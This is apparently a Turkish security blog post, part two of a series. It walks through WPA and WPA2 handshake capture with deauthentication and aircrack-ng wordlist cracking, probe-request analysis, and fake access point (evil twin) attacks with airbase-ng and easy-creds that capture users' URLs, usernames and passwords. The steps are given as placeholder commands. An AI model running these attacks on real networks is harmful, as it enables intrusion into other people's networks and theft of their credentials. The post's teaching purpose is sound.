1. Ana Sayfa
  2. Siber Güvenlik
  3. Kablosuz Ağ Saldırıları Uygulamaları – 2

Kablosuz Ağ Saldırıları Uygulamaları – 2

cyber-4444450_1920

Kablosuz Ağ Saldırıları Uygulamaları – 2 – Kablosuz ağ saldırıları günümüzde yaygın olarak kullandığımız teknolojilerden olan kablosuz ağlar üzerinde gerçekleştirebilecek olan kablosuz ağ saldırıları uygulamalarını ele alıyoruz.

– Kablosuz Ağ Saldırıları Uygulamaları – 2 –

WPA Cracking

airmon-ng <interface> <channel>

Komutu ile ağ kartı monitör moda alınır ve ağ trafiği dinlenir.

wpa cracking
airmon-ng <interface> <channel>

Bu saldırının gerçekleştirilebilmesi için handshake yakalamamız gerekli. Dolayısıyla clientless (istemcisiz) bir saldırı mümkün değildir.

airodump-ng <interface> –bssid <AP MAC> –channel <channel> -w <file name> <ineterface>

komutu ile AP üzerinde bağlı cihazlar görüntülenirken aynı zamanda belirtilen dosyaya da yakalanması halinde handshake yazılır.

wpa cracking
airodump-ng <interface> –bssid <AP MAC> –channel <channel> -w <file name> <ineterface>

AP üzerinde bağlı olan tek cihaz var dolayısıyla biz de onu hedefleyeceğiz. Handshake işlemi bir cihazın ağa bağlanması sırasında geçekleştirildiği için, ya bir cihazın ağa katılmasını bekleyeceğiz ya da deauthentication saldırısı yaparak ağdan düşüp tekrar bağlanmasını sağlayacağız. Bekelemek saatler sürebileceği için deauthentication saldırısı yapacağız.

aireplay-ng -0 <deauthentication packet numbers> -a <AP MAC> -c <target MAC> <interface>

komutu ile hedef cihazımızın ağdan düşüp tekrar bağlanmasını sağlıyoruz.

Kablosuz Ağ Saldırıları Uygulamaları – 2
aireplay-ng -0 <deauthentication packet numbers> -a <AP MAC> -c <target MAC> <interface>

Eğer handshake işlemi yakalnmışsa airodump üzerinde >WPA: handshake : MAC address<

Şeklinde bir bölüm görünmeye başlayacaktır.

Kablosuz Ağ Saldırıları Uygulamaları – 2
handshake yakalanınca oluşan tablo

Handshake dosyasının içerisinde parola bulunsa da, özelleştirilmiş bir encode işlemineden geçirildiği için bu sefer saldırı yaklaşımımız bir wordlist yardımı ile brutforce saldırısı yapmak olacaktır. Wordlist içerisindeki tüm değerlerin encode hali ile handshae içerisinde bulunan encode edilmiş parola karşılaştırılır. Eğer aynı ise bize döndürülür.

Hazır wordlistler kullanılacağı gibi bizimde Wordlist oluşturmamıza olanak sağlayacak olan cupp aracını kullanacağız.

Wordlist oluşturulduktan sonra aircrack-ng ile elimizdeki pakete bruteforce saldırısı yaparız.

aircrack-ng –w <wordlist> -c <handshake file (file with .cap extension)>

komutu ile crackking işlemi başlatılır.


WPA2 Crakcing

airmon-ng <interface> <channel>

Komutu ile ağ kartı monitör moda alınır ve ağ trafiği dinlenir.

wpa2 cracking
airmon-ng <interface> <channel>

Bu saldırı için de handshake yakalamamız gerekiyor. Dolayısıyla berlirleyeceğimiz bir hedefe deauthentication salrısı gerçekleştireceğiz.

airodump-ng <interface> –bssid <AP MAC> –channel <channel> -w <file name> <ineterface>

komutu ile AP üzerinde bağlı cihazlar görüntülenirken aynı zamanda belirtilen dosyaya da yakalanması halinde handshake yazılır.

wpa2 cracking
airodump-ng <interface> –bssid <AP MAC> –channel <channel> -w <file name> <ineterface>

aireplay-ng -0 <deauthentication packet number> -a <AP MAC> -c <target MAC> <interface>

komutu ile hedef cihazımızın ağdan düşüp tekrar bağlanmasını sağlıyoruz.

Kablosuz Ağ Saldırıları Uygulamaları – 2
aireplay-ng -0 <deauthentication packet number> -a <AP MAC> -c <target MAC> <interface>

Bu işlemden sonra handshake yakalama imkanımız oluşur.

WPA saldırısında kullandığımız wordlist oluşturmamıza olanak sağlayan cupp aracıyla tekrar bir wordlist oluşturuyoruz.

Kablosuz Ağ Saldırıları Uygulamaları – 2

Son olarak elde ettiğimiz handshake dosyasına oluştruduğumuz wordlist ile aircrack-ng aracını kullanarak bruteforce atağı gerçekleştireceğiz.

aircrack-ng <handshake file (file with .cap extension)> -w <wordlist>

wpa2 cracking
aircrack-ng <handshake file (file with .cap extension)> -w <wordlist>
wpa2 cracking - Kablosuz Ağ Saldırıları Uygulamaları – 2

Kablosuz Ağ Saldırıları Uygulamaları – 2 – Probe Request Analizi

İstemci cihazlar bir kablosuz ağa bağlanmak istedikleri zaman, öncelikle kendi üzerinde kayıtlı olan ağların ssid ve parolalarını probe request ile etrafa yayar. Bu durum belirli konumlarda bizim için kolaylık gibi görülse de cihazlarımız nerede olduğumuz bilemediklerinden tüm kayıtlı ağlara bağlanmaya çalışır. Böyle olunca saldırganlar tarafından etraftaki probe istekleri analiz edilerek hdedflenen cihazın sahte bir erişim noktasına otomatik olarak bağlanması sağlanabilir. İşin kötü yanı tüm bunlar olurken kullanıcının hiç şüphe etmemesidir.

Bu işlem için python scapy kütüphanesini kullanan analyze aracını kullanacağız.

Probe request analizi

Bilgileri topladıktan sonra kötüye kullanmak için sahte bir ağ oluşturalım. Yayılan probe isteklerinin SSID bilgisinin bir WPA2-CMMP-PSK özelliklerine sahip ağa ait olduğunu varsayalım. Bunun için bu özelliklerde bir ağ oluşturmamız gerekiyor.

airbase-ng –a <interface MAC> –ssid <fake network name> -c <channel> -F <file> -v (verbose mode) -Z 4 <interface>

komutu kullanılır.

Daha sonrasında WPA2 crack adımları uygulanarak parola elde edilmeye çalışılır.


Fake Access Point Saldırısı

Sahte bir AP oluşturulmak suretiyle etraftaki bilinçsiz kişilerin ağ trafiğinin içeriğinin değiştiril-mesine varacak kadar tehlikeli olan saldırı türüdür. Bu tip saldırılardan korunmak için open (korumasız) ağlara bağlanılmamalı. Cihazların otomatik bağlanma ayarları kontrol edilmelidir. 2016 yılında İsrail’de yaşanan Free TelAviv olayı en güzel örneklerden birisidir. İsrail’de başlatılan public alanlarda insanların faydalanması amaçlanmış olsa da saldırganlar tarafından istismar edilerek birçok kritik bilginin saldırganların eline geçmesine neden olmuştur.

Bu saldırı için çeşitli araçlar kullanılabilir. Biz easy-creads isimli aracı kullanacağız.

İlk karşımıza çıkan menüden 3 seçeneğini

Sonrasında ise 1 seçeneğini seçip devam ediyoruz

Kablosuz Ağ Saldırıları Uygulamaları – 2

Bu seçimden sonra bize sırasıyla

1- Sidejacking atak yapıp yapmayacağımızı

2- Hangi ağ arayüzünü kullanacağımızı

3- Fake Access Point isminin ne olacağını

Kablosuz Ağ Saldırıları Uygulamaları – 2

4- Ardından bize fake AP nin yayın kanalını sorar

5- Monitör moda geçebilmek için wlan arayüzü girmemiz istenir

6- MAC adresinin değiştirilip değiştirilmeyeceği sorulur

7- Kurbanın bağlanacağı kablosuz arayüz sorulur

8- Kullanıcılara IP verebilmek için DHCP konfigürasyonunun olup olmadığını sorar

9- Kullanıcıların hangi subnetten IP adresi alacağı girilir

10-DNS sunucusu girilir

Bir kullanıcı ağa bağlandığında airbase-ng aşağıdaki gibi görünecektir.

Kablosuz Ağ Saldırıları Uygulamaları – 2

Yakalanan verilerin görüntülenmesi için 4. Data Review seçilir ve hangi aracın çıktısı görüntülenmek isteniyorsa o numara seçilir.

Easy-creds bize log dosyasının yerini gösterir ve bizden tam yolu girmemizi ister.

Yol belirtildikten sonra aşağıdaki gibi küçük bir pencere açılır ve URL, kullanıcı adı, parola bilgisi listelenir.

Kablosuz Ağ Saldırıları Uygulamaları – 2

Yorum Yap
Yazı Kaynakları
dergipark.org.tr
defenceturk.net
gist.github.com
github.com/brav0hax
github.com/Mebus
github.com/0x90
canyoupwn.me
github.com/besimaltnok

Yorum Yap

Yorumlar (2)

  1. fatihkrkci_avatar
    8 ay önce

    Gayet güzel bir seri oluyor İsmet Bey severek takip ediyorum, elinize sağlık 🙂

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir